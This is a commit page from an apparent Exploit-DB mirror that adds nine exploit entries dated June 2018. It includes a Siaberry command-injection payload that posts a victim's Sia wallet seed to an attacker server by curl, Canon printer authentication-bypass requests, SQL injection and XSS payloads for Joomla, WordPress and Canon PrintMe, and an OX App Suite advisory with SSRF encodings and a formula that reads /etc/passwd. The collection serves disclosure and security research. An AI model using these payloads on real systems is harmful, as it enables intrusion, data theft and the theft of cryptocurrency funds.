bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-06-13

Browse source 
9 changes to exploits/shellcodes

WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' DoS
WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' Denial of Service (Metasploit)
Joomla! Component EkRishta 2.10 - 'username' SQL Injection
Siaberry 1.2.2 - Command Injection
OX App Suite 7.8.4 - Multiple Vulnerabilities
Canon PrintMe EFI - Cross-Site Scripting
WordPress Google Map Plugin < 4.0.4 - SQL Injection
WordPress Ultimate Form Builder Lite Plugin < 1.3.7 - SQL Injection
Canon LBP7110Cw - Authentication Bypass
Canon LBP6030w - Authentication Bypass
This commit is contained in:
Offensive Security 2018-06-13 05:01:52 +00:00
parent 1877107e5a
commit 6d3190ddfa
10 changed files with 704 additions and 2 deletions

60
exploits/hardware/webapps/44879.md Normal file
View file

@ -0,0 +1,60 @@
## Siaberry's Command Injection Vulnerability
Today, Id like to share several interesting vulnerabilities I discovered in Siaberry, a hardware device for earning cryptocurrency.
Siaberry runs on Sia, a decentralized marketplace for buying and selling data storage. The device is intended to give consumers a plug n play solution to sell storage on Sias network, though the two teams have no formal relationship. As buyers purchase space, Siaberry earns income for its owner in the form of Sias utility token, Siacoin.
I run a Sia node on my Synology NAS, but I was drawn to Siaberrys promise of a user-friendly web UI. I took Siaberry for a test drive, and I was blown away by how many serious issues I discovered within just a few hours.
## Command injection: working exploit
My most exciting finding was a command injection vulnerability on the login page.
In the video below, I demonstrate how an attacker can extract the private key from the victims Sia wallet simply by entering a particular password on Siaberrys login page:
https://www.youtube.com/watch?v=eVOyDglf4vE
## Understanding the vulnerability
The vulnerability is so obvious that many developers and security experts could tell you exactly what the code looked like by watching the video demo above. Ill confirm your suspicions.
The problem occurred in ActionPage.php:
```
$user=$_POST['uname'];
$pass=$_POST['psw'];
exec("sudo bin/checker $user $pass", $output, $exitcode);
```
Thats it. Thats the whole vulnerability.
Siaberry took untrusted input directly from an HTTP POST request and immediately executed it in the shell. This was a painfully easy vulnerability to exploit.
## How the exploit works
To exploit this, I created an attack server called evil-server. From that machine, I started netcat to dump all traffic it received on port 5555. For convenience, I used a server on my local network, but the same attack would work with any server address, remote or local.
I then used foo as the username and supplied a password of `badpassword || curl -d "$(siac wallet seeds)" -X POST evil-server:5555`.
When ActionPage.php reached its exec line, it executed the following command:
```
sudo bin/checker foo badpassword || \
curl -d "$(siac wallet seeds)" -X POST evil-server:5555
```
This caused the shell to execute three different commands. The first was the command that Siaberry meant to execute:
```
sudo bin/checker foo badpassword
```
This returned a non-zero exit code because foo/badpassword was a bad username/password combination. Therefore, the shell proceeded to execute the other side of the ||, starting with the embedded command:
```
siac wallet seeds
```
This launched siac, the Sia command-line interface. Those command-line parameters tell Sia to print its wallet seed to the console. The wallet seed is a 29-word passphrase that represents the wallets private key. Anyone who has this passphrase completely controls all funds in the victims wallet.
```
curl -d "$(siac wallet seeds)" -X POST evil-server:5555
```
Finally, the curl command made an HTTP POST request to http://evil-server:5555, sending the Sia wallet seed as the payload. The attacker, capturing messages on port 5555, recorded the victims wallet seed, giving them the ability to steal all funds in the victims wallet.

39
exploits/hardware/webapps/44885.txt Normal file
View file

@ -0,0 +1,39 @@
# Exploit Title: Canon LBP7110Cw - Authentication Bypass
# Date: 2018-06-07
# Exploit Author: Huy Kha
# Vendor Homepage: http://global.canon.com
# Version: LBP7110Cw
# CVE: CVE-2018-12049
# Severity: High (Leads to full System Manager Mode account take-over)
# Description : A remote attacker can bypass the Management Mode on the
# Canon LBP7110Cw web interface without a PIN for /checkLogin.cgi via
# vectors involving /portal_top.html to get full access to the device.
# PoC :
# As you can see when we're type a random password.
# You'll get an error for an incorrect authentication.
# Now with a simple request, we can bypass the authentication
# and get full access to the printer with ''Management Mode''
1. Go to the following url: http://TargetURL/
2. Click on Management Mode
3. Intercept now the request with Burpsuite and click then on 'Ok'' to
login. And now you have to forward POST /checkLogin.cgi HTTP/1.1 request
to the GET /portal_top.html HTTP/1.1
# Request :
GET /portal_top.html HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://164.125.112.38/
Cookie: sessid=QegLH5ETb92HEEPWr55AiA##
Connection: close
Upgrade-Insecure-Requests: 1
# Do we have now access to the printer with Management Mode? : Yes
# Impact: A remote attacker can have take-over the whole printer

38
exploits/hardware/webapps/44886.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: Canon LBP6030w - Authentication Bypass
# Date: 2018-06-07
# Exploit Author: Huy Kha
# Vendor Homepage: http://global.canon.com
# Version: LBP6030w
# Severity: High (Leads to full System Manager Mode account take-over)
# CVE: CVE-2018-12049
# Description : A remote attacker can bypass the System Manager Mode on the
# Canon LBP6030w web interface without a PIN for /checkLogin.cgi via vectors
# involving /portal_top.html to get full access to the device.
# PoC :
# Now with a simple request, we can bypass the authentication and get full
# access to the printer with ''System Manager Mode''
1. Go to the following url: http://TargetURL/
2. Click on System Manager Mode
3. Intercept now the request with Burpsuite and click then on 'Ok'' to
login. And now you have to forward POST /checkLogin.cgi HTTP/1.1 request to
the GET /portal_top.html HTTP/1.1
# Request :
GET /portal_top.html HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://23.125.171.217/
Cookie: sessid=TOIJNROiOcNQQaGdHeQ3PQ##
Connection: close
Upgrade-Insecure-Requests: 1
# Do we have now access to the printer with System Manager? : Yes
# Impact: A remote attacker can have take-over the whole printer if there
# is no PIN set by a user.

14
exploits/php/webapps/44867.txt
View file

@ -33,4 +33,16 @@ HTTP/1.1(2 seconds of response)
GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a)
HTTP/1.1(30 seconds of response)
HTTP/1.1(30 seconds of response)
# V. SYSTEMS AFFECTED
# Pie Register <= 3.0.9
# VI. DISCLOSURE TIMELINE
# May 10, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
# May 10, 2018 2: Send to vendor without response
# June 05, 2018 3: Second email to vendor without response
# June 11, 2018 4: Send to the Full-Disclosure lists
# VII. Solution
# Disable plugin until a fix is available

47
exploits/php/webapps/44877.txt Normal file
View file

@ -0,0 +1,47 @@
# Exploit Title: Joomla! Component EkRishta 2.10 - 'username' SQL Injection
# Date: 2018-06-11
# Exploit Author: L0RD
# Software Link: https://extensions.joomla.org/extension/ek-rishta/
# Vendor Homepage: https://www.joomlaextensions.co.in/
# Version: 2.10
# Tested on: Win 10
# POC : SQLi :
# Parameter : username
# Type : Error based
# Payload : 1' AND extractvalue(1,concat(0x3a,user(),0x3a))#
# Test : http://joomlaextension.biz/ekrishta/index.php/login/sign-in
# Request
POST /ekrishta/index.php/login/sign-in HTTP/1.1
Host: joomlaextension.biz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://joomlaextension.biz/ekrishta/index.php/login/sign-in
Content-Type: application/x-www-form-urlencoded
Content-Length: 264
Cookie: 2b59fab16cbbad2fc73d64e5cc7a2950=k0fcnijgbnnk4i8f15bem38vp3;
joomla_user_state=logged_in
Connection: keep-alive
Upgrade-Insecure-Requests: 1
username=1' AND
extractvalue(1,concat(0x3a,user(),0x3a))#&passwd=test%27&Submit=Log+in+to+your+account&Itemid=117&option=com_ekrishta&view=alluser&task=check_login&lid=loginuser&return=L2VrcmlzaHRhL2luZGV4LnBocC9sb2dpbi9zaWduLWlu&bac2b97217cd995b069b5b0bc198de1c=1
# Response
HTTP/1.1 500 XPATH syntax error: ':harmiste_rishtaa@localhost:' SQL=select
* from #__users where username='1' AND
extractvalue(1,concat(0x3a,user(),0x3a))#'
Server: nginx
Date: Mon, 11 Jun 2018 17:05:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Host-Header: 192fc2e7e50945beb8231a492d6a8024
Content-Length: 3181

20
exploits/php/webapps/44882.txt Normal file
View file

@ -0,0 +1,20 @@
# Title: Canon PrintMe EFI - Cross-Site Scripting
# Date: 9.6.2018-06-09
# Exploit Author: Huy Kha
# Vendor Homepage: [https://www.efi.com/]
# Version: Canon PrintMe EFI
# Tested on: Mozilla FireFox
# CVE: CVE-2018-12111
# XSS Payload used: '"--!><img src=x onerror=alert("XSS")>
# PoC
GET /wt3/mydocs.php/'%22--!%3E%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E HTTP/1.1
Host: 129.25.8.177
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=a11b2588fe327f6bd1acf79f286c2dcd
Connection: close
Upgrade-Insecure-Requests: 1

40
exploits/php/webapps/44883.txt Normal file
View file

@ -0,0 +1,40 @@
# Title: WordPress Google Map Plugin < 4.0.4 - SQL Injection
# Author: defensecode
# Date: 2018-06-12
# Software: WordPress WP Google Map plugin
# Version: 4.0.4 and below
# Vendor Status: Vendor contacted, no response
# Vulnerability Description
# The easiest way to reproduce the vulnerabilities is to visit the
# provided URL while being logged in as administrator or another user
# that is authorized to access the plugin settings page. Users that do
# not have full administrative privileges could abuse the database
# access the vulnerabilities provide to either escalate their privileges
# or obtain and modify database contents they were not supposed to be
# able to.
# Due to the missing nonce token, the vulnerable code is also directly
# exposed to attack vectors such as Cross Site request forgery (CSRF).
# SQL injection
# Vulnerable Function: $wpdb->get_results()
# Vulnerable Variable: $_GET['order']
# Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=wpgmp_manage_location&orderby=location_address&order=asc
PROCEDURE ANALYSE(EXTRACTVALUE(4242,CONCAT(0x42,(BENCHMARK(42000000,MD5(0x42424242))))),42)
# SQL injection
# Vulnerable Function: $wpdb->get_results()
# Vulnerable Variable: $_GET['orderby']
# Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=location_address%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(555)))xxx)&order=asc
# Disclosure Timeline
# 2018/05/11 Vulnerabilities discovered
# 2018/05/16 Vendor contacted
# 2018/06/08 No response
# 2018/06/12 Advisory released to the public

27
exploits/php/webapps/44884.txt Normal file
View file

@ -0,0 +1,27 @@
# Title: WordPress Ultimate Form Builder Lite Plugin < 1.3.7 - SQL Injection
# Author: defensecode
# Date: 2018-06-12
# Software: WordPress Ultimate Form Builder Lite plugin
# Version: 1.3.7 and below
# The easiest way to reproduce the SQL injection vulnerability is to
# visit the provided URL while being logged in as administrator or
# another user that is authorized to access the plugin settings page.
# Users that do not have full administrative privileges could abuse the
# database access the vulnerability provides to either escalate their
# privileges or obtain and modify database contents they were not
# supposed to be able to.
# SQL injection
# Vulnerable Function: $wpdb->get_row()
# Vulnerable Variable: $_POST['entry_id']
# Vulnerable URL: http://vulnerablesite.com/wp-admin/admin-ajax.php
# Vulnerable POST body:
entry_id=ExploitCodeHere&_wpnonce=xxx&action=ufbl_get_entry_detail_action
# Disclosure Timeline
# 2018/06/01 Vulnerabilities discovered
# 2018/06/06 Vendor contacted
# 2018/06/08 Vendor responded
# 2018/06/12 Advisory released to the public

411
exploits/xml/webapps/44881.txt Normal file
View file

@ -0,0 +1,411 @@
Product: OX App Suite
Vendor: OX Software GmbH
Internal reference: 55872 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev30, 7.8.2-rev30, 7.8.3-rev36, 7.8.4-rev18
Vendor notification: 2017-10-18
Solution date: 2018-02-08
Public disclosure: 2018-06-08
CVE reference: CVE-2018-5754
CVSS: n/a
Vulnerability Details:
Internet Explorer does not properly support modern Content Security Policies ("CSP"), which act as a failsafe for certain XSS attacks. Since the "Open in Browser" feature is a potential attack vector to inject malicious content, we removed that option at the user interface. Instead, users shall download attachments and open them from their device. This removes the issue of executing script-code under the same domain.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. This is a precautionary change
Solution:
We no longer offer "Open in Browser" for IE based browsers. Microsoft Edge is not affected by this change.
---
Internal reference: 56333 (Bug ID)
Vulnerability type: Improper Privilege Management (CWE-269)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev36, 7.8.2-rev39, 7.8.3-rev44, 7.8.4-rev22
Vendor notification: 2017-11-30
Solution date: 2018-02-08
Public disclosure: 2018-06-08
Researcher Credits: Michael Reizelman
CVE reference: CVE-2018-5756
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)
Vulnerability Details:
Permission checks for tasks were incomplete with regards to folder-to-object association.
Risk:
Users within the same context could delete other users tasks.
Steps to reproduce:
1. Create a task as User A (ID: 1)
2. As User B, trigger a /api/tasks?action=delete call with task ID 1 but a valid task folder ID of User B
Solution:
We enhanced permission checks for tasks for the "delete" call and check for folder-to-object association.
---
Internal reference: 56359 (Bug ID)
Vulnerability type: Improper Privilege Management (CWE-269)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev36, 7.8.2-rev39, 7.8.3-rev44, 7.8.4-rev22
Vendor notification: 2017-12-01
Solution date: 2018-02-08
Public disclosure: 2018-06-08
Researcher Credits: Michael Reizelman
CVE reference: CVE-2018-5756
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)
Vulnerability Details:
Permission checks for appointments were incomplete with regards to folder-to-object association.
Risk:
Users within the same context were able to add external participants to other users appointments. Those users would potentially get notified about subsequent appointment changes and could therefor gather information beyond their permission level.
Steps to reproduce:
1. Create a appointment as User A (ID: 1)
2. As User B, trigger a /api/calendar?action=confirm call with appointment ID 1 but a valid appointment folder ID of User B
3. Include a external participant in this "confirm" call
{"confirmmessage":"","confirmation":1, "type":5, "mail":"test@example.com"}
Solution:
We enhanced permission checks for appointments for the "confirm" call and check for folder-to-object association.
---
Internal reference: 56334 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev36, 7.8.2-rev39, 7.8.3-rev44, 7.8.4-rev22
Vendor notification: 2017-11-30
Solution date: 2018-02-08
Public disclosure: 2018-06-08
Researcher Credits: Alan Watt
CVE reference: CVE-2018-5752
CVSS: 6.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L)
Vulnerability Details:
OX App Suite tries to look up external mail account configuration using XML files for auto-configuration, that are placed at most mail providers hosts. Redirects of external HTTP services could be used to access local or internal networks instead, when looking up that external account information.
Risk:
By validating error codes and request duration, attackers can get insight about internal network configuration, open ports and associated services. Such information can serve as reconnaissance for further attacks.
Steps to reproduce:
1. Provide a malicious HTTP service that redirects any incoming request to a local IP/Port combination using HTTP 301.
2. Attempt to add a external mail account that uses the same domain as the malicious HTTP service
3. Check error codes and response times of the /api/autoconfig?action=get request
Solution:
We now deny access to network internal endpoints when following HTTP redirects.
---
Internal reference: 56407 (Bug ID)
Vulnerability type: Content Spoofing (CWE-451)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev31, 7.8.2-rev31, 7.8.3-rev41, 7.8.4-rev20
Vendor notification: 2017-12-06
Solution date: 2018-02-08
Public disclosure: 2018-06-08
CVE reference: CVE-2018-5753
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
The origin of a E-Mail is determined by the "From" or "Sender" address, which are provided by Mail headers and usually consist of a arbitrary personal part "Mr. Foo Bar (CEO)" and the actual sender address "<foo@example.com>". Using specific unicode characters at the personal part could be used to disguise the actual origin of the E-Mail.
Risk:
Attackers can use this vulnerability to support social-engineering based attacks to individual users by tampering the origin of an E-Mail.
Steps to reproduce:
1. Create a E-Mail which contains very long "personal" parts or mail addresses as personal parts.
Solution:
We now display the actual sender address next to the "personal" part of the sender and make sure that this information cannot be influenced by externally provided content.
---
Internal reference: 56056 (Bug ID)
Vulnerability type: Improper Privilege Management (CWE-269)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev35, 7.8.2-rev38, 7.8.3-rev41, 7.8.4-rev19
Vendor notification: 2017-11-08
Solution date: 2017-12-13
Public disclosure: 2018-06-08
Researcher Credits: Alan Watt
CVE reference: CVE-2017-17062
CVSS: 3.1 (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N)
Vulnerability Details:
Certain "user attributes" (UA identifier, login timestamps...) can be saved by using arbitrary users identifiers within the same context. The original intention was to allow this for users with elevated permissions.
Risk:
While no way to access other users attributes is known, this can be used to void non-repudiation.
Steps to reproduce:
1. Forge a API request to store/request custom user attributes for a different user (ID: 3)
Proof of concept:
PUT https://example.com/ajax/user?session=xxx&name=tree&id=3&action=setAttribute
{"name":"foo", "value": "bar"}
Solution:
We check permissions on a user- and context-level to make sure just privileged users can set and read user attributes.
---
Internal reference: 56580 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: office-web
Report confidence: Confirmed
Solution status: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.3-rev12, 7.8.4-rev9
Vendor notification: 2017-12-22
Solution date: 2018-02-08
Public disclosure: 2018-06-08
CVE reference: CVE-2018-5754
CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)
Vulnerability Details:
Script code within Presentations is being executed when transferring it to the clipboard. This is done by "copying" or "cutting" text using keyboard commands.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Create a malicious presentation file which contains script-code as text
2. Cloak the code by using low-contrast colors, font sizes etc.
Proof of concept:
"><img src=x onerror=prompt(document.domain)>
Solution:
We make sure that client-side content gets cleaned up and not evaluated before transferring to the clipboard.
---
Internal reference: 56582 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev36, 7.8.2-rev39, 7.8.3-rev44, 7.8.4-rev22
Vendor notification: 2017-12-22
Solution date: 2018-02-08
Public disclosure: 2018-06-08
Researcher Credits: Secator
CVE reference: CVE-2018-5754
CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)
Vulnerability Details:
Malformed CSS can be used to inject script code.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Create a malicious E-Mail and send it to a OX App Suite user
2. Open that E-Mail as user
Proof of concept:
<style>
.a {
font-family: </styl/**/e>;
font-family: </sty/**/le>;
font-family: </s/*data*/tyle>;
}
.<iframe/onload=alert(document["cookie"])> { }
</style>
Solution:
We enhanced the sanitizer to consider malformed CSS content and improve stability.
---
Internal reference: 56619 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev36, 7.8.2-rev39, 7.8.3-rev44, 7.8.4-rev22
Vendor notification: 2018-01-03
Solution date: 2018-02-08
Public disclosure: 2018-06-08
Researcher Credits: Alan Watt
CVE reference: CVE-2018-5752
CVSS: 6.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L)
Vulnerability Details:
OX App Suite can be used to embed external RSS feeds, which are requested using HTTP. Redirects of external HTTP services could be used to access local or internal networks instead, when looking up that external account information.
Risk:
By validating error codes and request duration, attackers can get insight about internal network configuration, open ports and associated services. Such information can serve as reconnaissance for further attacks.
Steps to reproduce:
1. Provide a malicious HTTP service that redirects any incoming HTTP request to a local IP/Port combination using HTTP 301.
2. Add a RSS feed that points to the same host as the malicious HTTP service
Solution:
We now deny access to network internal endpoints when following HTTP redirects.
---
Internal reference: 56477 (Bug ID)
Vulnerability type: Information Exposure (CWE-200)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev36, 7.8.2-rev39, 7.8.3-rev44, 7.8.4-rev22
Vendor notification: 2017-12-12
Solution date: 2018-02-08
Public disclosure: 2018-06-08
CVE reference: CVE-2018-5751
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)
Vulnerability Details:
Inviting external users to share content creates temporary user accounts to handle permissions. Several APIs expose information about user accounts, however data of external guests is not meant to be available for others than the sharee and users that got access to the shared content.
Risk:
Information about guest users, primarily E-Mail addresses, is available to all users within the same context even though they are not entitled to access it.
Steps to reproduce:
1. Share content with an external user by using the "invite by mail" option
2. As another user of the same context, query the "groups" and "users" API
Solution:
We restrict access to guest user data and reduce the amount of data provided for groups.
---
Internal reference: 56706 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev36, 7.8.2-rev39, 7.8.3-rev44, 7.8.4-rev22
Vendor notification: 2017-10-16
Solution date: 2018-02-08
Public disclosure: 2018-06-08
Researcher Credits: Alan Watt
CVE reference: CVE-2018-5752
CVSS: 6.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L)
Vulnerability Details:
OX App Suite uses several blacklists to restrict access of external services. Those do not cover non-decimal representations of IP addresses and special IPv6 related addresses. Some libraries accept such values but our blacklist fails to convert them when checking.
Risk:
Attackers can forge server-side requests to internal systems to gather information about network infrastructure and services.
Proof of concept:
1. Convert the IP address of a internal host, which is protected by a blacklist, to a octal or hexadecimal value
127.0.0.1: 0177.00.00.01 (8-bit octal) or 0x7f00000 (32-bit hexadecimal)
2. Use IPv6 mapping of IPv4 addresses
127.0.0.1: 0:0:0:0:0:FFFF:7F00:0001
3. Use very special representations of "local" addresses
127.0.0.1: 0000
4. Use IPv6 local addresses
127.0.0.1: :: or ::1
Solution:
We did adjust our blacklist implementation to cover IPv6 and other representations of restricted addresses.
---
Internal reference: 56718 (Bug ID)
Vulnerability type: Path Traversal (CWE-22)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: readerengine
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev3, 7.8.2-rev4, 7.8.3-rev5, 7.8.4-rev4
Vendor notification: 2018-01-10
Solution date: 2018-02-08
Public disclosure: 2018-06-08
Researcher Credits: Zhang Tianqi(pnig0s)
CVE reference: CVE-2018-5755
CVSS: 7.7 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)
Vulnerability Details:
Specifically crafted spreadsheets can be exploited to extract system information, including content and location of local files.
Risk:
Attackers can read local files of the host running the "readerengine" component depending on their local access permissions for the "open-xchange" user. This includes configuration files which potentially include passwords and other sensitive information. Some functions allow to access internal system information like operating system and paths. Other than that its possible to check the existence of certain files that provide hints about patch level and other details.
Steps to reproduce:
1. Create a malicious ODS based spreadsheet and use formulas that reference local files or read system information
Proof of concept:
=WEBSERVICE("file:///etc/passwd")
=CELL("filename")
=INFO("system")
Solution:
We now filter ODS and OOXML function content against a blacklist.
---
Internal reference: 56740 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev3, 7.8.2-rev4, 7.8.3-rev5, 7.8.4-rev4
Vendor notification: 2018-01-12
Solution date: 2018-04-24
Public disclosure: 2018-06-08
Researcher Credits: Secator
CVE reference: CVE-2018-5754
CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)
Vulnerability Details:
Media-types can be altered in a way that our content scanner is circumvented and potentially harmful content gets passed to the requesting client.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Create a malicious XML file and modify its media-type
2. Upload, embed and make someone open this file
Proof of concept:
"t,text/html" or "t/@,image/svg+xml"
"garbage\u00ff/garbage" (will work for Firefox as it "guesses" the media-type based on the filename and multipart data)
Solution:
We now reject to define media-types which are not covered by application logic.

10
files_exploits.csv
View file

@ -5991,7 +5991,7 @@ id,file,description,date,author,type,platform,port
44847,exploits/macos/dos/44847.c,"Apple macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver",2018-06-06,"Google Security Research",dos,macos,
44848,exploits/multiple/dos/44848.c,"Apple macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist",2018-06-06,"Google Security Research",dos,multiple,
44849,exploits/multiple/dos/44849.txt,"XNU Kernel - Heap Overflow Due to Bad Bounds Checking in MPTCP",2018-06-06,"Google Security Research",dos,multiple,
44876,exploits/linux/dos/44876.rb,"WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' DoS",2018-06-11,"Dhiraj Mishra",dos,linux,
44876,exploits/linux/dos/44876.rb,"WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' Denial of Service (Metasploit)",2018-06-11,"Dhiraj Mishra",dos,linux,
44857,exploits/linux/dos/44857.html,"Gnome Web (Epiphany) < 3.28.2.1 - Denial of Service",2018-06-08,rop,dos,linux,
44859,exploits/multiple/dos/44859.html,"WebKit - WebAssembly Compilation Info Leak",2018-06-08,"Google Security Research",dos,multiple,
44860,exploits/multiple/dos/44860.js,"Google Chrome - Integer Overflow when Processing WebAssembly Locals",2018-06-08,"Google Security Research",dos,multiple,
@ -39538,3 +39538,11 @@ id,file,description,date,author,type,platform,port
44872,exploits/php/webapps/44872.py,"userSpice 4.3.24 - Username Enumeration",2018-06-11,"Dolev Farhi",webapps,php,
44873,exploits/php/webapps/44873.txt,"Schools Alert Management Script - 'get_sec.php' SQL Injection",2018-06-11,M3@Pandas,webapps,php,
44874,exploits/php/webapps/44874.txt,"Schools Alert Management Script - Arbitrary File Read",2018-06-11,M3@Pandas,webapps,php,
44877,exploits/php/webapps/44877.txt,"Joomla! Component EkRishta 2.10 - 'username' SQL Injection",2018-06-12,L0RD,webapps,php,
44879,exploits/hardware/webapps/44879.md,"Siaberry 1.2.2 - Command Injection",2018-06-11,"Space Duck",webapps,hardware,
44881,exploits/xml/webapps/44881.txt,"OX App Suite 7.8.4 - Multiple Vulnerabilities",2018-06-12,Open-Xchange,webapps,xml,
44882,exploits/php/webapps/44882.txt,"Canon PrintMe EFI - Cross-Site Scripting",2018-06-12,"Huy Kha",webapps,php,
44883,exploits/php/webapps/44883.txt,"WordPress Google Map Plugin < 4.0.4 - SQL Injection",2018-06-12,defensecode,webapps,php,
44884,exploits/php/webapps/44884.txt,"WordPress Ultimate Form Builder Lite Plugin < 1.3.7 - SQL Injection",2018-06-12,defensecode,webapps,php,
44885,exploits/hardware/webapps/44885.txt,"Canon LBP7110Cw - Authentication Bypass",2018-06-12,"Huy Kha",webapps,hardware,
44886,exploits/hardware/webapps/44886.txt,"Canon LBP6030w - Authentication Bypass",2018-06-12,"Huy Kha",webapps,hardware,

Can't render this file because it is too large.